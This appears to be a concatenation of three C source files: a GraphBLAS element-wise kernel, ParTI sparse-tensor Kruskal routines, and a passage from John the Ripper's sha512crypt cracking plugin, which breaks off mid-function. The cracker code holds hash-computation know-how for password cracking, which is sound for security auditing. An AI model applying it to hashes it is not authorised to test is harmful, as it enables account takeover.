#include "GB_emult_02_template.c"
}
else
{
// use fmult(x,y)
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
}
#else
// No need to handle the flip: the operator is either commutative, or
// has been handled by changing z=div(y,x) to z=rdiv(x,y) for example.
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<M> = A.*B, M sparse/hyper, A and B bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_04__rminus_fp32)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict Cp_kfirst,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_04_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, C<!M>=A.*B where C is bitmap
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_bitmap__rminus_fp32)
(
GrB_Matrix C,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_bitmap_emult_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (x,Bx): apply a binary operator to a matrix with scalar bind1st
//------------------------------------------------------------------------------
GrB_Info GB (_bind1st__rminus_fp32)
(
GB_void *Cx_output, // Cx and Bx may be aliased
const GB_void *x_input,
const GB_void *Bx_input,
const int8_t *restrict Bb,
int64_t bnz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float *Cx = (float *) Cx_output ;
float x = (*((float *) x_input)) ;
float *Bx = (float *) Bx_input ;
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < bnz ; p++)
{
if (!GBB (Bb, p)) continue ;
float bij = GBX (Bx, p, false) ;
Cx [p] = (bij - x) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (Ax,y): apply a binary operator to a matrix with scalar bind2nd
//------------------------------------------------------------------------------
GrB_Info GB (_bind2nd__rminus_fp32)
(
GB_void *Cx_output, // Cx and Ax may be aliased
const GB_void *Ax_input,
const GB_void *y_input,
const int8_t *restrict Ab,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
float *Cx = (float *) Cx_output ;
float *Ax = (float *) Ax_input ;
float y = (*((float *) y_input)) ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!GBB (Ab, p)) continue ;
float aij = GBX (Ax, p, false) ;
Cx [p] = (y - aij) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (x, A'): transpose and apply a binary operator
//------------------------------------------------------------------------------
// cij = op (x, aij), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
float aij = GBX (Ax, pA, false) ; \
Cx [pC] = (aij - x) ; \
}
GrB_Info GB (_bind1st_tran__rminus_fp32)
(
GrB_Matrix C,
const GB_void *x_input,
const GrB_Matrix A,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
// GB_unop_transpose.c uses GB_ATYPE, but A is
// the 2nd input to binary operator z=f(x,y).
#undef GB_ATYPE
#define GB_ATYPE \
float
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float x = (*((const float *) x_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
#undef GB_ATYPE
#define GB_ATYPE \
float
}
//------------------------------------------------------------------------------
// C = op (A', y): transpose and apply a binary operator
//------------------------------------------------------------------------------
// cij = op (aij, y), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
float aij = GBX (Ax, pA, false) ; \
Cx [pC] = (y - aij) ; \
}
GrB_Info GB (_bind2nd_tran__rminus_fp32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GB_void *y_input,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float y = (*((const float *) y_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
rankktensor.c | /*
This file is part of ParTI!.
ParTI! is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as
published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.
ParTI! is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with ParTI!.
If not, see <http://www.gnu.org/licenses/>.
*/
#include <HiParTI.h>
#include <stdlib.h>
#include <string.h>
int ptiNewRankKruskalTensor(ptiRankKruskalTensor *ktsr, ptiIndex nmodes, const ptiIndex ndims[], ptiElementIndex rank)
{
ktsr->nmodes = nmodes;
ktsr->rank = rank;
ktsr->ndims = (ptiIndex*)malloc(nmodes*sizeof(ptiIndex));
for(ptiIndex i=0; i<nmodes; ++i)
ktsr->ndims[i] = ndims[i];
ktsr->lambda = (ptiValue*)malloc(rank*sizeof(ptiValue));
ktsr->fit = 0.0;
return 0;
}
/**
* Shuffle factor matrices row indices.
*
* @param[in] ktsr Kruskal tensor to be shuffled
* @param[out] map_inds is the renumbering mapping
*
*/
void ptiRankKruskalTensorInverseShuffleIndices(ptiRankKruskalTensor * ktsr, ptiIndex ** map_inds) {
/* Renumber factor matrices rows */
ptiIndex new_i;
for(ptiIndex m=0; m < ktsr->nmodes; ++m) {
ptiRankMatrix * mtx = ktsr->factors[m];
ptiIndex * mode_map_inds = map_inds[m];
ptiValue * tmp_values = malloc(mtx->cap * mtx->stride * sizeof (ptiValue));
for(ptiIndex i=0; i<mtx->nrows; ++i) {
new_i = mode_map_inds[i];
for(ptiElementIndex j=0; j<mtx->ncols; ++j) {
tmp_values[i * mtx->stride + j] = mtx->values[new_i * mtx->stride + j];
}
}
free(mtx->values);
mtx->values = tmp_values;
}
}
void ptiFreeRankKruskalTensor(ptiRankKruskalTensor *ktsr)
{
ktsr->rank = 0;
ktsr->fit = 0.0;
free(ktsr->ndims);
free(ktsr->lambda);
for(ptiIndex i=0; i<ktsr->nmodes; ++i)
ptiFreeRankMatrix(ktsr->factors[i]);
free(ktsr->factors);
ktsr->nmodes = 0;
}
double KruskalTensorFitHiCOO(
ptiSparseTensorHiCOO const * const hitsr,
ptiValue const * const __restrict lambda,
ptiRankMatrix ** mats,
ptiRankMatrix ** ata)
{
ptiIndex const nmodes = hitsr->nmodes;
double ptien_normsq = SparseTensorFrobeniusNormSquaredHiCOO(hitsr);
// printf("ptien_normsq: %lf\n", ptien_normsq);
double const norm_mats = KruskalTensorFrobeniusNormSquaredRank(nmodes, lambda, ata);
// printf("norm_mats: %lf\n", norm_mats);
double const inner = SparseKruskalTensorInnerProductRank(nmodes, lambda, mats);
// printf("inner: %lf\n", inner);
double residual = ptien_normsq + norm_mats - 2 * inner;
if (residual > 0.0) {
residual = sqrt(residual);
}
// printf("residual: %lf\n", residual);
double fit = 1 - (residual / sqrt(ptien_normsq));
return fit;
}
// Column-major.
/* Compute a Kruskal tensor's norm is compute on "ata"s. Check Tammy's sparse */
double KruskalTensorFrobeniusNormSquaredRank(
ptiIndex const nmodes,
ptiValue const * const __restrict lambda,
ptiRankMatrix ** ata) // ata: column-major
{
ptiElementIndex const rank = ata[0]->ncols;
ptiElementIndex const stride = ata[0]->stride;
ptiValue * const __restrict tmp_atavals = ata[nmodes]->values; // Column-major
double norm_mats = 0;
#ifdef HIPARTI_USE_OPENMP
#pragma omp parallel for schedule(static)
#endif
for(ptiIndex x=0; x < rank*stride; ++x) {
tmp_atavals[x] = 1.;
}
// printf("KruskalTensorFrobeniusNormSquaredRank: \n");
// ptiDumpRankMatrix(ata[nmodes], stdout);
/* Compute Hadamard product for all "ata"s */
for(ptiIndex m=0; m < nmodes; ++m) {
ptiValue const * const __restrict atavals = ata[m]->values;
#ifdef HIPARTI_USE_OPENMP
#pragma omp parallel for schedule(static)
#endif
for(ptiElementIndex i=0; i < rank; ++i) {
for(ptiElementIndex j=i; j < rank; ++j) {
tmp_atavals[j * stride + i] *= atavals[j * stride + i];
}
}
}
// printf("KruskalTensorFrobeniusNormSquaredRank: \n");
// ptiDumpRankMatrix(ata[nmodes], stdout);
/* compute lambda^T * aTa[MAX_NMODES] * lambda, only compute a half of them because of its symmetric */
// #ifdef HIPARTI_USE_OPENMP
// #pragma omp parallel for schedule(static) reduction(+:norm_mats)
// #endif
for(ptiElementIndex i=0; i < rank; ++i) {
norm_mats += tmp_atavals[i+(i*stride)] * lambda[i] * lambda[i];
for(ptiElementIndex j=i+1; j < rank; ++j) {
norm_mats += tmp_atavals[i+(j*stride)] * lambda[i] * lambda[j] * 2;
}
// printf("inter norm_mats: %lf\n", norm_mats);
}
return fabs(norm_mats);
}
// Row-major, compute via MTTKRP result (mats[nmodes]) and mats[nmodes-1].
double SparseKruskalTensorInnerProductRank(
ptiIndex const nmodes,
ptiValue const * const __restrict lambda,
ptiRankMatrix ** mats)
{
ptiElementIndex const rank = mats[0]->ncols;
ptiElementIndex const stride = mats[0]->stride;
ptiIndex const last_mode = nmodes - 1;
ptiIndex const I = mats[last_mode]->nrows;
// printf("mats[nmodes-1]:\n");
// ptiDumpMatrix(mats[nmodes-1], stdout);
// printf("mats[nmodes]:\n");
// ptiDumpMatrix(mats[nmodes], stdout);
ptiValue const * const last_vals = mats[last_mode]->values;
ptiValue const * const tmp_vals = mats[nmodes]->values;
ptiValue * buffer_accum;
double inner = 0;
double * const __restrict accum = (double *) malloc(rank*sizeof(*accum));
#ifdef HIPARTI_USE_OPENMP
#pragma omp parallel for schedule(static)
#endif
for(ptiElementIndex r=0; r < rank; ++r) {
accum[r] = 0.0;
}
#ifdef HIPARTI_USE_OPENMP
#pragma omp parallel
{
int const nthreads = omp_get_num_threads();
#pragma omp master
{
buffer_accum = (ptiValue *)malloc(nthreads * rank * sizeof(ptiValue));
for(ptiIndex j=0; j < (ptiIndex)nthreads * rank; ++j)
buffer_accum[j] = 0.0;
}
}
#endif
#ifdef HIPARTI_USE_OPENMP
#pragma omp parallel
{
int const tid = omp_get_thread_num();
int const nthreads = omp_get_num_threads();
ptiValue * loc_accum = buffer_accum + tid * rank;
#pragma omp for
for(ptiIndex i=0; i < I; ++i) {
for(ptiElementIndex r=0; r < rank; ++r) {
loc_accum[r] += last_vals[r+(i*stride)] * tmp_vals[r+(i*stride)];
}
}
#pragma omp for schedule(static)
for(ptiElementIndex j=0; j < rank; ++j) {
for(ptiIndex i=0; i < (ptiIndex)nthreads; ++i) {
accum[j] += buffer_accum[i*rank + j];
}
}
}
#else
for(ptiIndex i=0; i < I; ++i) {
for(ptiElementIndex r=0; r < rank; ++r) {
accum[r] += last_vals[r+(i*stride)] * tmp_vals[r+(i*stride)];
}
}
#endif
#ifdef HIPARTI_USE_OPENMP
#pragma omp parallel for schedule(static) reduction(+:inner)
#endif
for(ptiElementIndex r=0; r < rank; ++r) {
inner += accum[r] * lambda[r];
}
#ifdef HIPARTI_USE_OPENMP
free(buffer_accum);
#endif
return inner;
} |
cryptsha512_fmt_plug.c | /*
* This file is part of John the Ripper password cracker,
* based on rawSHA256_fmt.c code and Drepper's spec at
* http://www.akkadia.org/drepper/SHA-crypt.txt
*
* This software is Copyright (c) 2012 magnum, and it is hereby released to the
* general public under the following terms: Redistribution and use in source
* and binary forms, with or without modification, are permitted.
*
* See code/comments in cryptsha256 for how and why this is being done. NOTE,
* we could limit ourselves to 15 byte password, and then only need 1 limb
* SHA512 SIMD logic. If we allow 2 limb logic then 79 byte passwords are max.
* this is better than cryptsha256, where if we only allowed 1 limb, then only
* 3 btye passwords would have been max, and even at 2 limbs, 35 byte passwords
* are the longest we can do.
*
* Porting to SSE2, May 2015, JimF. A little harder than some, since we have to
* group and rearrange passwords based upon length. We must only run passwords
* of a specific block group size in 1 SSE_COEF_SHA512 bundle. If we later do
* PARA_SHA512, then each bundle of SSE_COEF_SHA512*PARA_SHA512 will have to be
* made up of passwords of same block group size.
*
* Here are the block sizes per password length. To be equal group size, all
* numbers for 2 passwords must be equal all the way across. So, password
* lengths of 0, 1, ... 15 are 1 group. 16..23 are another group. 24..31 are
* yet another, etc. There are 5 'groups' of lengths.
*
* Here is the raw block length data. Only first and last length for the group has been kept.
Len: cp pspc cspp ppc cpp psc csp pc
0 : 1 1 1 1 1 1 1 1
15 : 1 1 1 1 1 1 1 1
16 : 1 2 2 1 1 1 1 1
23 : 1 2 2 1 1 1 1 1
24 : 1 2 2 2 2 1 1 1
31 : 1 2 2 2 2 1 1 1
32 : 1 2 2 2 2 2 2 1
47 : 1 2 2 2 2 2 2 1
48 : 2 2 2 2 2 2 2 2
79 : 2 2 2 2 2 2 2 2
Source to make above table (made up to 90,but over 79 is 3 limbs)
#include <stdio.h>
int c=64, s=16;
int S(int sz) {
if (sz<=111) return 1;
else if (sz <= 111+128) return 2;
else return 3;
}
void proc(int p) {
int cp=p+c;
printf("%-2d : %d %d %d %d %d %d %d %d\n",
p,S(cp),S(cp+s+p),S(cp+s+p),S(cp+p),S(cp+p),S(cp+s),S(cp+s),S(cp));
}
void main(int argc, char **argv) {
int i;
if (argc==2) s=atoi(argv[1]);
printf("Len: cp pspc cspp ppc cpp psc csp pc (saltlen=%d)\n",s);
for (i = 0; i < 90; ++i)
proc(i);
}
*/
#if FMT_EXTERNS_H
extern struct fmt_main fmt_cryptsha512;
#elif FMT_REGISTERS_H
john_register_one(&fmt_cryptsha512);
#else
#include "arch.h"
//#undef SIMD_COEF_64
#include "sha2.h"
#define _GNU_SOURCE 1
#include <string.h>
#include "params.h"
#include "common.h"
#include "formats.h"
#include "johnswap.h"
#include "simd-intrinsics.h"
#ifdef _OPENMP
#ifndef OMP_SCALE
#define OMP_SCALE 16
#endif
#include <omp.h>
#endif
#include "memdbg.h"
// NOTE, in SSE mode, even if NOT in OMP, we may need to scale, quite a bit, due to needing
// to 'group' passwords differently, so that we have lengths which 'share' the same number
// of crypt block counts for each 'type'. We may want to scale as much as 128 or so, just
// to try to have better saturation. If we only had 8 passwords given to us, and they were
// one each of these lengths: 3 7 8 12 13 14 15 21, in theory, we could do this
// with only 2 SSE calls (SIMD_COEF_32==4 for SHA256). However, length 3 has to to run by itself,
// length 7 by itself, 8 by itself, and the rest can run together, but there are 5 of them,
// so it takes to runs. So, instead of 2 runs, we have to do 5 runs. Not very efficient.
// however, if we have a lot more passwords to work with, we can re-arrange them, to run
// them in groups that all 'fit' together, and do so until we exhaust all from a given length
// range, then do all in the next range. Thus, until we get to the last set within a length
// range, we are doing a fully packed SSE run, and having a LOT less wasted space. This will
// get even more interesting, when we start doing OMP, but it should just be the same principal,
// preload more passwords, and group them, then run the OMP threads over a single length, then
// go to the next length, until done, trying to keep each thread running, and keeping each block
// of SSE data full, until the last in a range. We probably can simply build all the rearrangments,
// then let the threads go on ALL data, without caring about the length, since each thread will only
// be working on passwords in a single MMX buffer that all match, at any given moment.
#ifdef SIMD_COEF_64
#ifdef _OPENMP
#define SIMD_COEF_SCALE (32/SIMD_COEF_64)
#else
#define SIMD_COEF_SCALE (64/SIMD_COEF_64)
#endif
#else
#define SIMD_COEF_SCALE 1
#endif
#define FORMAT_LABEL "sha512crypt"
#ifdef SIMD_COEF_64
#define ALGORITHM_NAME SHA512_ALGORITHM_NAME
#else
#if ARCH_BITS >= 64
#define ALGORITHM_NAME "64/" ARCH_BITS_STR " " SHA2_LIB
#else
#define ALGORITHM_NAME "32/" ARCH_BITS_STR " " SHA2_LIB
#endif
#endif
// 79 is max length we can do in 2 SIMD limbs, so just make it 79 always.
#define PLAINTEXT_LENGTH 79
#define BINARY_ALIGN 4
#define SALT_SIZE sizeof(struct saltstruct)
#define SALT_ALIGN 4
#ifdef SIMD_COEF_64
#define MIN_KEYS_PER_CRYPT (SIMD_COEF_64*SIMD_PARA_SHA512)
#define MAX_KEYS_PER_CRYPT (SIMD_COEF_64*SIMD_PARA_SHA512)
#if ARCH_LITTLE_ENDIAN==1
#define GETPOS(i, index) ( (index&(SIMD_COEF_64-1))*8 + ((i)&(0xffffffff-7))*SIMD_COEF_64 + (7-((i)&7)) + (unsigned int)index/SIMD_COEF_64*SHA_BUF_SIZ*SIMD_COEF_64*8 )
#else
#define GETPOS(i, index) ( (index&(SIMD_COEF_64-1))*8 + ((i)&(0xffffffff-7))*SIMD_COEF_64 + ((i)&7) + (unsigned int)index/SIMD_COEF_64*SHA_BUF_SIZ*SIMD_COEF_64*8 )
#endif
#else
#define MIN_KEYS_PER_CRYPT 1
#define MAX_KEYS_PER_CRYPT 1
#endif
// these MUST be defined prior to loading cryptsha512_valid.h
#define BINARY_SIZE 64
#define SALT_LENGTH 16
#define CIPHERTEXT_LENGTH 86
#define __CRYPTSHA512_CREATE_PROPER_TESTS_ARRAY__
#include "cryptsha512_common.h"
#define BLKS MAX_KEYS_PER_CRYPT
/* This structure is 'pre-loaded' with the keyspace of all possible crypts which */
/* will be performed WITHIN the inner loop. There are 8 possible buffers that */
/* are used. They are cp, pspc, cspp, ppc, cpp, psc, csp, and pc, where p stands */
/* for the 'hash' built from the password (and it is the same length as the */
/* password), s stands for the hash built from the salt (same size as salt), and */
/* c stands for the crypt results from the prior loop. There are 8 possible */
/* buffer layouts listed, but they fall into a pattern that is 42 long (2*3*7) */
/* this structure encapsulates this. we build this buffer, after computing the */
/* s hash, the p hash, and the starting c values. Then, within the inner loop, */
/* we simply spin through this structure, calling the SHA512 code to do the work. */
/* NOTE, most of the time, there will be 1 block and 2 block crypts. As the */
/* the password length grows, the more 2 block crypts there are, thus slower */
/**/
/* for SSE only, but 'could' be done for sha2.c code (jtr sha2) */
/* This keyspace was changed, to be put into BE at the start, and then we never */
/* do any swapping, but keep it in BE format from that point on. To do this, we */
/* changed the pointers to be a pointer to the start of the block, AND an offset */
/* for SSE, we need a pointer to the start of the block[0], and the offset. The */
/* index needed will be known in the crypt_all. This means we need something */
/* similar to out GET_POS macros, but also for oSSL formats. */
/* To do this, we have to use the JtR sha2.c functions, since there is this func: */
/* sha512_hash_block(&CTX, data, int perform_endian_swap). So if we set the last */
/* param to 0, we can call this function, and it will avoid the byte swapping */
typedef struct cryptloopstruct_t {
unsigned char buf[8*2*128*BLKS]; // will allocate to hold 42 2 block buffers (42 * 2 * 128) Reduced to only requiring 8*2*128
// now, the cryptstructs are on the stack within the crypt for loop, so we avoid allocation.
// and to avoid the single static variable, or a static array.
unsigned char *bufs[BLKS][42]; // points to the start of each 2 block buffer.
#ifdef SIMD_COEF_64
int offs[BLKS][42];
#endif
unsigned char *cptr[BLKS][42]; // points to where we copy the crypt pointer for next round.
// Round 0 points to somewhere in round 1's buffer, etc.
int datlen[42]; // if 1, then this is a small, only 1 block crypt. Some rounds for shorter passwords take only 1 crypt block.
// NOTE, datlen could be changed to a number, and then we could do > 2 block crypts. Would take a little
// more memory (and longer PW's certainly DO take more time), but it should work fine. It may be an issue
// especially when doing OMP, that the memory footprint of this 'hot' inner loop simply gets too big, and
// things slow down. For now, we are limiting ourselves to 35 byte password, which fits into 2 SHA512 buffers
} cryptloopstruct;
static int (*saved_len);
static char (*saved_key)[PLAINTEXT_LENGTH + 1];
static uint32_t (*crypt_out)[BINARY_SIZE / sizeof(uint32_t)];
/* these 2 values are used in setup of the cryptloopstruct, AND to do our SHA512_Init() calls, in the inner loop */
static const unsigned char padding[256] = { 0x80, 0 /* 0,0,0,0.... */ };
#if !defined(JTR_INC_COMMON_CRYPTO_SHA2) && !defined (SIMD_COEF_64)
static const uint64_t ctx_init[8] =
{0x6A09E667F3BCC908ULL,0xBB67AE8584CAA73BULL,0x3C6EF372FE94F82BULL,0xA54FF53A5F1D36F1ULL,0x510E527FADE682D1ULL,0x9B05688C2B3E6C1FULL,0x1F83D9ABFB41BD6BULL,0x5BE0CD19137E2179ULL};
#endif
static struct saltstruct {
unsigned int len;
unsigned int rounds;
unsigned char salt[SALT_LENGTH];
} *cur_salt;
static void init(struct fmt_main *self)
{
int omp_t = 1;
int max_crypts;
#ifdef _OPENMP
omp_t = omp_get_max_threads();
omp_t *= OMP_SCALE;
#endif
max_crypts = SIMD_COEF_SCALE * omp_t * MAX_KEYS_PER_CRYPT;
self->params.max_keys_per_crypt = max_crypts;
// we allocate 1 more than needed, and use that 'extra' value as a zero
// length PW to fill in the tail groups in MMX mode.
saved_len = mem_calloc(1 + max_crypts, sizeof(*saved_len));
saved_key = mem_calloc(1 + max_crypts, sizeof(*saved_key));
crypt_out = mem_calloc(1 + max_crypts, sizeof(*crypt_out));
}
static void done(void)
{
MEM_FREE(crypt_out);
MEM_FREE(saved_key);
MEM_FREE(saved_len);
}
#define COMMON_GET_HASH_VAR crypt_out
#include "common-get-hash.h"
static void set_key(char *key, int index)
{
saved_len[index] = strnzcpyn(saved_key[index], key, sizeof(*saved_key));
}
static char *get_key(int index)
{
saved_key[index][saved_len[index]] = 0;
return saved_key[index];
}
/*
These are the 8 types of buffers this algorithm uses:
cp
pspc
cspp
ppc
cpp
psc
csp
pc
*/
static void LoadCryptStruct(cryptloopstruct *crypt_struct, int index, int idx, char *p_bytes, char *s_bytes) {
unsigned len_pc, len_ppsc, len_ppc, len_psc; // length of 'data'
unsigned tot_pc, tot_ppsc, tot_ppc, tot_psc; // length of entire block to crypt (128 or 256)
unsigned off_pc, off_pspc, off_ppc, off_psc; // offset to the crypt ptr for these 4 'types'.
unsigned dlen_pc, dlen_ppsc, dlen_ppc, dlen_psc; // is this 1 or 2 block (or actual len for CommonCrypto, since it uses SHA512_Final()
unsigned plen=saved_len[index];
unsigned char *cp = crypt_struct->buf;
cryptloopstruct *pstr = crypt_struct;
#ifdef SIMD_COEF_64
// in SSE mode, we FORCE every buffer to be 2 blocks, even if it COULD fit into 1.
// Then we simply use the 2 block SSE code.
unsigned char *next_cp;
cp += idx*2*128;
#endif
len_pc = plen + BINARY_SIZE;
len_ppsc = (plen<<1) + cur_salt->len + BINARY_SIZE;
len_ppc = (plen<<1) + BINARY_SIZE;
len_psc = plen + cur_salt->len + BINARY_SIZE;
#ifdef JTR_INC_COMMON_CRYPTO_SHA2
if (len_pc <=111) tot_pc =128; else tot_pc =256;
if (len_ppsc<=111) tot_ppsc=128; else tot_ppsc=256;
if (len_ppc <=111) tot_ppc =128; else tot_ppc =256;
if (len_psc <=111) tot_psc =128; else tot_psc =256;
dlen_pc =len_pc;
dlen_ppsc=len_ppsc;
dlen_ppc =len_ppc;
dlen_psc =len_psc;
#else
if (len_pc <=111) {tot_pc =128; dlen_pc =128;}else{tot_pc =256; dlen_pc =256; }
if (len_ppsc<=111) {tot_ppsc=128; dlen_ppsc=128;}else{tot_ppsc=256; dlen_ppsc=256; }
if (len_ppc <=111) {tot_ppc =128; dlen_ppc =128;}else{tot_ppc =256; dlen_ppc =256; }
if (len_psc <=111) {tot_psc =128; dlen_psc =128;}else{tot_psc =256; dlen_psc =256; }
#endif
off_pc = len_pc - BINARY_SIZE;
off_pspc = len_ppsc - BINARY_SIZE;
off_ppc = len_ppc - BINARY_SIZE;
off_psc = len_psc - BINARY_SIZE;
// Adjust cp for idx;
#ifdef SIMD_COEF_64
next_cp = cp + (2*128*BLKS);
#endif
// pstr->buf[0] is a cp (First of this type)
pstr->bufs[idx][0] = pstr->cptr[idx][41] = cp;
// For fist element only, we DO copy in the c value.
memcpy(cp, crypt_out[index], BINARY_SIZE); cp += BINARY_SIZE;
memcpy(cp, p_bytes, plen); cp += plen;
if (!idx) pstr->datlen[0] = dlen_pc;
memcpy(cp, padding, tot_pc-2-len_pc); cp += (tot_pc-len_pc);
pstr->bufs[idx][0][tot_pc-2] = (len_pc<<3)>>8;
pstr->bufs[idx][0][tot_pc-1] = (len_pc<<3)&0xFF;
#ifdef SIMD_COEF_64
cp = next_cp;
next_cp = cp + (2*128*BLKS);
#endif
// pstr->buf[1] is a pspc (First of this type)
pstr->bufs[idx][1] = cp;
pstr->cptr[idx][0] = cp + off_pspc;
memcpy(cp, p_bytes, plen); cp += plen;
memcpy(cp, s_bytes, cur_salt->len); cp += cur_salt->len;
memcpy(cp, p_bytes, plen); cp += (plen+BINARY_SIZE);
if (!idx) pstr->datlen[1] = dlen_ppsc;
memcpy(cp, padding, tot_ppsc-2-len_ppsc); cp += (tot_ppsc-len_ppsc);
pstr->bufs[idx][1][tot_ppsc-2] = (len_ppsc<<3)>>8;
pstr->bufs[idx][1][tot_ppsc-1] = (len_ppsc<<3)&0xFF;
#ifdef SIMD_COEF_64
cp = next_cp;
next_cp = cp + (2*128*BLKS);
#endif
// pstr->buf[2] is a cspp (First of this type)
pstr->bufs[idx][2] = pstr->cptr[idx][1] = cp;
cp += BINARY_SIZE;
memcpy(cp, s_bytes, cur_salt->len); cp += cur_salt->len;
memcpy(cp, p_bytes, plen); cp += plen;
memcpy(cp, p_bytes, plen); cp += plen;
if (!idx) pstr->datlen[2] = dlen_ppsc;
memcpy(cp, padding, tot_ppsc-2-len_ppsc); cp += (tot_ppsc-len_ppsc);
pstr->bufs[idx][2][tot_ppsc-2] = (len_ppsc<<3)>>8;
pstr->bufs[idx][2][tot_ppsc-1] = (len_ppsc<<3)&0xFF;
#ifdef SIMD_COEF_64
cp = next_cp;
next_cp = cp + (2*128*BLKS);
#endif
// pstr->buf[3] is a ppc (First of this type)
pstr->bufs[idx][3] = cp;
pstr->cptr[idx][2] = cp + off_ppc;
memcpy(cp, p_bytes, plen); cp += plen;
memcpy(cp, p_bytes, plen); cp +=(plen+BINARY_SIZE);
if (!idx) pstr->datlen[3] = dlen_ppc;
memcpy(cp, padding, tot_ppc-2-len_ppc); cp += (tot_ppc-len_ppc);
pstr->bufs[idx][3][tot_ppc-2] = (len_ppc<<3)>>8;
pstr->bufs[idx][3][tot_ppc-1] = (len_ppc<<3)&0xFF;
#ifdef SIMD_COEF_64
cp = next_cp;
next_cp = cp + (2*128*BLKS);
#endif
// pstr->buf[4] is a cspp (from 2)
pstr->bufs[idx][4] = pstr->cptr[idx][3] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[4] = dlen_ppsc;
// pstr->buf[5] is a pspc (from [1])
pstr->bufs[idx][5] = pstr->bufs[idx][1]; pstr->cptr[idx][4] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[5] = dlen_ppsc;
// pstr->buf[6] is a cpp (First of this type)
pstr->bufs[idx][6] = pstr->cptr[idx][5] = cp;
cp += BINARY_SIZE;
memcpy(cp, p_bytes, plen); cp += plen;
memcpy(cp, p_bytes, plen); cp += plen;
if (!idx) pstr->datlen[6] = dlen_ppc;
memcpy(cp, padding, tot_ppc-2-len_ppc); cp += (tot_ppc-len_ppc);
pstr->bufs[idx][6][tot_ppc-2] = (len_ppc<<3)>>8;
pstr->bufs[idx][6][tot_ppc-1] = (len_ppc<<3)&0xFF;
#ifdef SIMD_COEF_64
cp = next_cp;
next_cp = cp + (2*128*BLKS);
#endif
// pstr->buf[07] psc (First of this type)
pstr->bufs[idx][7] = cp;
pstr->cptr[idx][6] = cp + off_psc;
memcpy(cp, p_bytes, plen); cp += plen;
memcpy(cp, s_bytes, cur_salt->len); cp += (cur_salt->len+BINARY_SIZE);
if (!idx) pstr->datlen[7] = dlen_psc;
memcpy(cp, padding, tot_psc-2-len_psc); cp += (tot_psc-len_psc);
pstr->bufs[idx][7][tot_psc-2] = (len_psc<<3)>>8;
pstr->bufs[idx][7][tot_psc-1] = (len_psc<<3)&0xFF;
#ifdef SIMD_COEF_64
cp = next_cp;
next_cp = cp + (2*128*BLKS);
#endif
// pstr->buf[08] cspp (from 2)
pstr->bufs[idx][8] = pstr->cptr[idx][7] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[8] = dlen_ppsc;
// pstr->buf[09] ppc (from 3)
pstr->bufs[idx][9] = pstr->bufs[idx][3]; pstr->cptr[idx][8] = pstr->cptr[idx][2];
if (!idx) pstr->datlen[9] = dlen_ppc;
// pstr->buf[10] cspp (from 2)
pstr->bufs[idx][10] = pstr->cptr[idx][9] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[10] = dlen_ppsc;
// pstr->buf[11] pspc (from 1)
pstr->bufs[idx][11] = pstr->bufs[idx][1]; pstr->cptr[idx][10] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[11] = dlen_ppsc;
// pstr->buf[12] cpp (from 6)
pstr->bufs[idx][12] = pstr->cptr[idx][11] = pstr->bufs[idx][6];
if (!idx) pstr->datlen[12] = dlen_ppc;
// pstr->buf[13] pspc (from 1)
pstr->bufs[idx][13] = pstr->bufs[idx][1]; pstr->cptr[idx][12] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[13] = dlen_ppsc;
// pstr->buf[14] csp (First of this type)
pstr->bufs[idx][14] = pstr->cptr[idx][13] = cp;
cp += BINARY_SIZE;
memcpy(cp, s_bytes, cur_salt->len); cp += cur_salt->len;
memcpy(cp, p_bytes, plen); cp += plen;
if (!idx) pstr->datlen[14] = dlen_psc;
memcpy(cp, padding, tot_psc-2-len_psc); cp += (tot_psc-len_psc);
